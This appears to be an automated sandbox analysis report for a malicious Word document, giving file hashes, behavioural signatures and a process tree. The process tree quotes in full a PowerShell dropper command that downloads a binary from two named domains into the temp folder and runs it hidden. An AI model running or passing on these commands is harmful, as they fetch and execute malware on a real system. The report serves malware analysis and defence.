Analysis
- max time kernel: 138s
- max time network: 181s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-11-2022 09:30
Behavioral task behavioral1
- Sample: 3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc
- Resource: win7-20220901-en
Behavioral task behavioral2
- Sample: 3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc
- Resource: win10v2004-20220812-en
General
- Target: 3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc
- Size: 78KB
- MD5: 8d2ff5302b1a00e27fc74a4a0e7d691e
- SHA1: c31d9dabf66ca0bcf3d18e530bd8c659451f6867
- SHA256: 3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73
- SHA512: 3021215fea7224c5fe15a7838c9353c6745bc3f0729ff8df46b77d9aa7a002214280a6056ce6bf43a0248d0bbda5a1d7a3c54e4b38ace76b52161a09ae94262f
- SSDEEP: 1536:fvCIgb6Evkehxknn1N9AQTZZNcXlCqe8K6NV:fvCI87vhyn1NnTZZNmCqTN
Malware Config
Signatures
- Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 4520 | 1676 | cmd.exe | WINWORD.EXE
- Blocklisted process makes network request (2 IoCs)
Processes (flow | pid | process):
63 | 3884 | powershell.exe
65 | 3884 | powershell.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description | ioc | process):
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes (pid | process):
1676 | WINWORD.EXE
1676 | WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes (pid | process):
2088 | powershell.exe
2088 | powershell.exe
3884 | powershell.exe
3884 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description | pid | process):
Token: SeDebugPrivilege | 2088 | powershell.exe
Token: SeDebugPrivilege | 3884 | powershell.exe
- Suspicious use of FindShellTrayWindow (2 IoCs)
Processes (pid | process):
1676 | WINWORD.EXE
1676 | WINWORD.EXE
- Suspicious use of SetWindowsHookEx (8 IoCs)
Processes (pid | process):
1676 | WINWORD.EXE
1676 | WINWORD.EXE
1676 | WINWORD.EXE
1676 | WINWORD.EXE
1676 | WINWORD.EXE
1676 | WINWORD.EXE
1676 | WINWORD.EXE
1676 | WINWORD.EXE
- Suspicious use of WriteProcessMemory (10 IoCs)
Processes (description | pid | process | target process):
PID 1676 wrote to memory of 2860 | 1676 | WINWORD.EXE | splwow64.exe
PID 1676 wrote to memory of 2860 | 1676 | WINWORD.EXE | splwow64.exe
PID 1676 wrote to memory of 4520 | 1676 | WINWORD.EXE | cmd.exe
PID 1676 wrote to memory of 4520 | 1676 | WINWORD.EXE | cmd.exe
PID 4520 wrote to memory of 2088 | 4520 | cmd.exe | powershell.exe
PID 4520 wrote to memory of 2088 | 4520 | cmd.exe | powershell.exe
PID 2088 wrote to memory of 4552 | 2088 | powershell.exe | cmd.exe
PID 2088 wrote to memory of 4552 | 2088 | powershell.exe | cmd.exe
PID 4552 wrote to memory of 3884 | 4552 | cmd.exe | powershell.exe
PID 4552 wrote to memory of 3884 | 4552 | cmd.exe | powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc" /o ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exe (depth 2)
Command line: C:\Windows\splwow64.exe 12288
-
C:\Windows\SYSTEM32\cmd.exe (depth 2)
Command line: cmd /c powershell "'powershell ""function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,''%tmp%\bdvtso.exe'');start-process ''%tmp%\bdvtso.exe'';}try{tvcv(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{tvcv(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath %tmp%\dmmawike.bat; start-process '%tmp%\dmmawike.bat' -windowstyle hidden"
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: powershell "'powershell ""function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,''C:\Users\Admin\AppData\Local\Temp\bdvtso.exe'');start-process ''C:\Users\Admin\AppData\Local\Temp\bdvtso.exe'';}try{tvcv(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{tvcv(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath C:\Users\Admin\AppData\Local\Temp\dmmawike.bat; start-process 'C:\Users\Admin\AppData\Local\Temp\dmmawike.bat' -windowstyle hidden"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dmmawike.bat" "
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 5)
Command line: powershell "function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,'C:\Users\Admin\AppData\Local\Temp\bdvtso.exe');start-process 'C:\Users\Admin\AppData\Local\Temp\bdvtso.exe';}try{tvcv('http://electrofluxequipmentspvtltd.com/pl.bin')}catch{tvcv('http://goloramltd.com/pl.bin')}
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: 556084f2c6d459c116a69d6fedcc4105
SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 70595b5937369a2592a524db67e208d3
SHA1: d989b934d9388104189f365694e794835aa6f52f
SHA256: be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512: edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5
-
C:\Users\Admin\AppData\Local\Temp\dmmawike.bat
Filesize: 316B
MD5: 64c3347fc92ba1c4dc7deb5e71e6ef03
SHA1: a3f5dc5f745fc7e29fc623c9f462a4521acbc7c6
SHA256: a5d9b37253770a17e6864658da3c982bc70e0fab7490bc89a1d66fc5e698701c
SHA512: 99b9f821be7ac6890cfd8077c32d17887cda60ef0a92bbe65045c0281474f5047838d323a9f9ab4cf1e1496e868c9ae04a2108aa55cc7714f8d328a2af1e9bca